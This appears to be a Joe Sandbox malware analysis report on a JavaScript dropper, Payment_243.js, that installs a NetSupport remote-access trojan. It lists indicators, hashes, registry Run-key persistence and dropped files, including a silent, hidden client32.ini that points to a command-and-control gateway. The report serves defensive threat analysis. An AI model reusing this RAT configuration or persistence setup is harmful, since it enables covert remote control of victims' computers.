http://%s/testpage.htm	client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://0.30000000000000004.com/	Payment_243.js	false	Avira URL Cloud: safe	unknown
http://127.0.0.1	client32.exe, client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	false		high
http://www.symauth.com/cps0(	HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr	false		high
https://momentjs.com/	Payment_243.js	false		high
http://%s/fakeurl.htm	client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.asp&	client32.exe, 00000004.00000002.670510259.00000000004F7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	client32.exe.0.dr	false		high
https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation	Payment_243.js	false		high
https://www.thawte.com/cps0/	webmvorbisencoder.dll.0.dr	false		high
http://www.symauth.com/rpa00	HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr	false		high
https://www.thawte.com/repository0W	webmvorbisencoder.dll.0.dr	false		high
http://www.netsupportschool.com/tutor-assistant.asp11(L	client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/ecomfe/zrender/blob/master/LICENSE.txt	Payment_243.js	false		high
https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).	Payment_243.js	false	Avira URL Cloud: safe	unknown
http://www.netsupportschool.com/tutor-assistant.asp	client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	false	Avira URL Cloud: safe	unknown
https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js	Payment_243.js	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.155.249.215	unknown	Germany	34549	MEER-ASmeerfarbigGmbHCoKGDE	true
104.26.0.231	geo.netsupportsoftware.com	United States	13335	CLOUDFLARENETUS	false
185.157.213.71	unknown	Spain	50129	TVHORADADAES	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591022
Start date and time:	2025-01-14 16:19:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment_243.js
Detection:	MAL
Classification:	mal100.rans.evad.winJS@5/26@1/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 80% Number of executed functions: 108 Number of non-executed functions: 263
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:21:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\x225qa0\client32.exe
07:21:20	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\x225qa0\client32.exe
10:20:16	API Interceptor	342x Sleep call for process: wscript.exe modified
10:21:14	API Interceptor	778015x Sleep call for process: client32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.0.231	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	geo.netsupportsoftware.com/location/loca.asp
	5j0fix05fy.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	lFxGd66yDa.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geo.netsupportsoftware.com	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	104.26.0.231
	5j0fix05fy.js	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	Merge.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	lFxGd66yDa.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	104.26.0.231
	5q1Wm5VlqL.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MEER-ASmeerfarbigGmbHCoKGDE	https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow	Get hash	malicious	HTMLPhisher	Browse	80.77.25.196
	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	5.1.66.185
	payload.exe	Get hash	malicious	Metasploit	Browse	45.155.249.178
	test1.ps1	Get hash	malicious	Unknown	Browse	45.155.249.178
	uC4EETMDcz.exe	Get hash	malicious	SystemBC	Browse	45.155.249.199
	cNF6fXdjPw.dll	Get hash	malicious	Socks5Systemz	Browse	45.155.250.225
	x86_64.elf	Get hash	malicious	Unknown	Browse	45.90.96.167
	arm.elf	Get hash	malicious	Unknown	Browse	45.90.96.167
	spc.elf	Get hash	malicious	Mirai	Browse	45.90.96.167
	sh4.elf	Get hash	malicious	Mirai	Browse	45.90.96.167
CLOUDFLARENETUS	http://vionicstore.shop	Get hash	malicious	Unknown	Browse	104.18.73.116
	http://yourexcellency.activehosted.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.xrmtoolbox.com/	Get hash	malicious	Unknown	Browse	172.67.197.240
	mWAik6b.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	172.67.150.129
	https://mercedesinsua.com.ar/?infox=Ymxha2Uuc2lyZ29AY290ZXJyYS5jb20=	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://secure.ezpassbgy.top/pay	Get hash	malicious	Unknown	Browse	104.21.15.205
	https://2ol.itectaxice.ru/Qm75/	Get hash	malicious	Unknown	Browse	104.17.25.14
	m68k.elf	Get hash	malicious	Unknown	Browse	172.68.102.177
	https://forms.office.com/e/xknrfCPQkR	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://bankersonline.emlnk1.com/lt.php?x=3DZy~GDKVXafEpOq0AE4hRad~XEkk_HzluhlXXTGVXjNDHz~_Uy.0eht1H_zk_D2kvY3bHHJJ3ab62	Get hash	malicious	Unknown	Browse	104.16.117.116
TVHORADADAES	https://gthlcanada.com	Get hash	malicious	Unknown	Browse	185.76.79.50
	http://indyhumane.org	Get hash	malicious	Unknown	Browse	185.76.79.50
	garm7.elf	Get hash	malicious	Mirai	Browse	156.67.60.69
	goarm7.elf	Get hash	malicious	Mirai	Browse	156.67.60.72
	nrsh4.elf	Get hash	malicious	Mirai	Browse	156.67.60.72
	eppc.elf	Get hash	malicious	Mirai	Browse	156.67.60.30
	lDO4WBEQyL.exe	Get hash	malicious	GO Backdoor	Browse	185.157.213.253
	nshsh4.elf	Get hash	malicious	Mirai	Browse	156.67.60.38
	https://agradeahead.com/	Get hash	malicious	Unknown	Browse	185.76.79.50
	http://productfocus.com	Get hash	malicious	Unknown	Browse	185.76.79.50

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\x225qa0\HTCTL32.DLL	5j0fix05fy.js	Get hash	malicious	NetSupport RAT	Browse
	Update.js	Get hash	malicious	NetSupport RAT	Browse
	hkpqXovZtS.exe	Get hash	malicious	NetSupport RAT	Browse
	Update.js	Get hash	malicious	NetSupport RAT	Browse
	update.js	Get hash	malicious	NetSupport RAT	Browse
	Update.js	Get hash	malicious	NetSupport RAT	Browse
	update.js	Get hash	malicious	NetSupport RAT	Browse
	updates.js	Get hash	malicious	NetSupport RAT	Browse
	updates.js	Get hash	malicious	NetSupport RAT	Browse
	Update 124.0.6367.158.js	Get hash	malicious	NetSupport RAT	Browse

Created / dropped Files

C:\ProgramData\x225qa0.zip

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	2845498
Entropy (8bit):	7.997717653428638
Encrypted:	true
SSDEEP:	49152:b7X1ZldlEDThXBJOhHyx6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRpykTo:X1wFXa4hRFY89YYc9jh23redpmQRZCP7
MD5:	4C1AFE882E6D7C945A8397DCB02A2478
SHA1:	85BA754BB1515A1EDC4054A8A3396C238DCE2B7E
SHA-256:	67F6FC03CD53FB2A5AB17B97CAAE29B4FD0E0AFB7ADF4C9C64CDB2F7F99D03D4
SHA-512:	A1778AE5F89DBBC57AC70C8A8B1CC419DFE015C7F9C9A58AC9957AB3723EDF812A4681CAF167EC63D0EA571448DC01FE01E5B12C5538C98B6BA404CAD2F79B0F
Malicious:	false
Reputation:	low
Preview:	PK........DwZ................install/PK.........P)Z..Q~....\|.......install/5B8FEB2AF817493Es.....TDF$QrL....`.G..l5...J.0...T.R..COg..........:...7<-.#....Q ...(....Me......I.T%Q.....}H.;....3K..pM..j+..JJ..).Q~..x?..D.e..&~..f.....(.n!.v.3.o.j...%{.....b...>..y....z...........z...E>......HJD.A.]..y.{~.wx..^U.<.w.L..~..j..[.h<:.,...b.....yb....Y...`Y..0.F....Y...\.......FJ....c....{..ne..!..89...Z.......asi........]....N.M.Dy;RD[...m#?..\. d........w..T.P...`G...V..q.Pd..g.. 8[....2^..~4#^.k..S.5...{{.)W.2.&..P.G1L^Y.'.Q..t/...~#~z.9...:.....;t..I...b.gd ...T....#.....?A...~.f.%..U...B./.........g?7d.$.).....{B..#.E....4.N....:...mM.].LDw.C.A.7.z..)R.qi-..j.~3E....e+.q2...}'.{.."'.W.....{]\|.gK..yA..;.x.2..Y..x..iP.J.I....]........;..TK..%.b...z.+.a....Q...$..r.MNL...@.S.4;...a.n.Om=....oCm,`o...Q.(......&.p.T.Y..........p..<a.#x.hQ.C.N"iu..f..A.#..CS.43N..t.Hcg....\|..t......&8u....xL.Y$.)..Z4At...W......Z..z7.'2.m...ZO...)..w ..:.L.gp.....y...6

C:\ProgramData\x225qa0\HTCTL32.DLL

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328056
Entropy (8bit):	6.7547459359511395
Encrypted:	false
SSDEEP:	6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
MD5:	C94005D2DCD2A54E40510344E0BB9435
SHA1:	55B4A1620C5D0113811242C20BD9870A1E31D542
SHA-256:	3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
SHA-512:	2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\HTCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Joe Sandbox View:	Filename: 5j0fix05fy.js, Detection: malicious, Browse Filename: Update.js, Detection: malicious, Browse Filename: hkpqXovZtS.exe, Detection: malicious, Browse Filename: Update.js, Detection: malicious, Browse Filename: update.js, Detection: malicious, Browse Filename: Update.js, Detection: malicious, Browse Filename: update.js, Detection: malicious, Browse Filename: updates.js, Detection: malicious, Browse Filename: updates.js, Detection: malicious, Browse Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\x225qa0\NSM.LIC

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.924914741174998
Encrypted:	false
SSDEEP:	6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
MD5:	E9609072DE9C29DC1963BE208948BA44
SHA1:	03BBE27D0D1BA651FF43363587D3D6D2E170060F
SHA-256:	DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
SHA-512:	F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..

C:\ProgramData\x225qa0\NSM.ini

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Generic INItialization configuration [Features]
Category:	dropped
Size (bytes):	6458
Entropy (8bit):	4.645519507940197
Encrypted:	false
SSDEEP:	96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
MD5:	88B1DAB8F4FD1AE879685995C90BD902
SHA1:	3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
SHA-256:	60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
SHA-512:	4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
Malicious:	false
Preview:	..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

C:\ProgramData\x225qa0\PCICHEK.DLL

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18808
Entropy (8bit):	6.292094060787929
Encrypted:	false
SSDEEP:	192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
MD5:	104B30FEF04433A2D2FD1D5F99F179FE
SHA1:	ECB08E224A2F2772D1E53675BEDC4B2C50485A41
SHA-256:	956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
SHA-512:	5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\PCICHEK.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\x225qa0\PCICL32.DLL

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3740024
Entropy (8bit):	6.527276298837004
Encrypted:	false
SSDEEP:	49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
MD5:	D3D39180E85700F72AAAE25E40C125FF
SHA1:	F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
SHA-256:	38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
SHA-512:	471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\x225qa0\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\PCICL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

C:\ProgramData\x225qa0\TCCTL32.DLL

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	396664
Entropy (8bit):	6.80911343409989
Encrypted:	false
SSDEEP:	12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
MD5:	2C88D947A5794CF995D2F465F1CB9D10
SHA1:	C0FF9EA43771D712FE1878DBB6B9D7A201759389
SHA-256:	2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
SHA-512:	E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\TCCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............\|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\x225qa0\client32.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103824
Entropy (8bit):	6.674952714045651
Encrypted:	false
SSDEEP:	768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
MD5:	C4F1B50E3111D29774F7525039FF7086
SHA1:	57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
SHA-256:	18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
SHA-512:	005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\x225qa0\client32.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........\|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\x225qa0\client32.ini

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	676
Entropy (8bit):	5.438750337777859
Encrypted:	false
SSDEEP:	12:XWJxS2hz7YU+Sj8ZGShR8kkivlnxOZ7+DP981E7GXoKIDWQCYnmSu+L8AR:XWJI2hzEPI8ZNR8pivlnxOoG1fXtID/F
MD5:	95C974137591C8018AC92DEA29AA416C
SHA1:	E0808277D7FED2B4DB1176FA4FA79DA420BFD865
SHA-256:	7F92999396927D24370F6FE3D2E8EA408C9917D34F42C0205EA3F3296B6C04F4
SHA-512:	767AE7FFCA47BB8F8170C44C66EEBF9623412A5D2E07D67FC3FCF1AB5F6CE49C08A68D91E00EBD0B52C052AD5454E57B16A28BAED8B1E0B2C585448EAE8AE1E0
Malicious:	false
Preview:	0x33b1a391....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=185.157.213.71:443..gsk=FI:N>AABED9I<L?N..gskmode=0..GSK=FI:N>AABED9I<L?N..GSKX=FI:N>AABED9I<L?N..

C:\ProgramData\x225qa0\guarantee\14844_13380793255498334.pma

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	576
Entropy (8bit):	3.74490007255712
Encrypted:	false
SSDEEP:	12:bHCsUaXhIi90pgIJKlkQIkzDTze/W2rXJ0cl/7:biERIiMdMkvkm/WgXW07
MD5:	0DDC9B893EA3AF54D152F94410653A9D
SHA1:	3C7E16964DFFD7342AE931E38E00F67DC0E4C307
SHA-256:	0128461FAC52A5DEEC5B0F0410928E0C2AFC1AB710990BDEDEA47A68EB5ECC3D
SHA-512:	24463708FBDACFF90FCB4964A6335687D8EEB49094E6154D0AA37FD9E8DE7D870396E424756465F4F86EDF0BAA6138B7F52035559A04FB243C29D42395AE92A2
Malicious:	false
Preview:	...@....................@...............@...X...............`... ...i.y.........SetupMetrics........i.y..Yd.X.......A.......e............,.........C.3...................C.3................UMA.PersistentAllocator.SetupMetrics.UsedPct....h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.0.......A...................a.#........z..?...................z..?................Setup.Install.LzmaUnPackStatus_SetupExePatch....X...i.y.[".............................................................................

C:\ProgramData\x225qa0\guarantee\17680_13380946966794438.pma

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	1696
Entropy (8bit):	4.244464042583567
Encrypted:	false
SSDEEP:	48:bixIiMdMA/JWo/XkWHUVyHBF+J4X8XRL1g:bi4MQgW8yByv
MD5:	3E4B8369C88B5B5561EF39F297AE5B7E
SHA1:	128D40127E1BCD1DC3A26DF7ED685AD95482F2EA
SHA-256:	3774458149778D9527E0A9ACE07B42EF609F0BB1E856E6C2DFD0B7CBD8B09F73
SHA-512:	65C3DC909AA69121EF46A79D8F62D234D69B5856796FDD5F4AE4FC030BC0FB953175577CC34B41B38E2C39D44CBCB97DD34628C074B74C189CFD522B57602F2C
Malicious:	false
Preview:	...@....................@...................................`... ...i.y.........SetupMetrics........i.y..Yd.X.......A.......e............,.........C.3...................C.3................UMA.PersistentAllocator.SetupMetrics.UsedPct....h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.H.......A...................a.#.....y....)..................y....)..................Setup.Install.LzmaUnPackStatus_CompressedChromeArchive..X...i.y.[".................................................................................i.y..Yd.........A...................a.#.........]l....................]l................Setup.Install.LzmaUnPackStatus_UncompressedChromeArchive........x...i.y..Yd........A.......P...Q...`...l..?....]......Q................]......Q................Setup.Install.Result....X...i.y.[".............................................................................................................................

C:\ProgramData\x225qa0\guarantee\2176_13380946966665858.pma

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	344
Entropy (8bit):	3.4385863420423908
Encrypted:	false
SSDEEP:	6:bHCsLlXj9IiIwkttBtw++CMwCkXxL4bM5/zGJOg4lTQwlroL:bHCsRXhIiq50pgIJKlkQY
MD5:	1B7CDDDFB06152AE01F12D9F253237D6
SHA1:	1EF358781A086A0727F4FA95CD53510EB328BC52
SHA-256:	FD668D6EDCF6B6CC176EDD9BF7B0D7F1881FE2F0D94EBAE656127C27A359550E
SHA-512:	4705C93B233BE92DD2D04649D404B538BC76607BBE655D5E35A739653AC1AF776ECDD12EC1CBF81476070EC5BAE633F891817155014730A06939EFB21BD132EA
Malicious:	false
Preview:	...@....................@...............X...`...............`... ...i.y.........SetupMetrics........i.y..Yd.0.......A.......e............,.........C.3...................C.3................UMA.PersistentAllocator.SetupMetrics.UsedPct....h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e.......

C:\ProgramData\x225qa0\guarantee\camera_mf_trace.wprp

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24910
Entropy (8bit):	5.246760185320695
Encrypted:	false
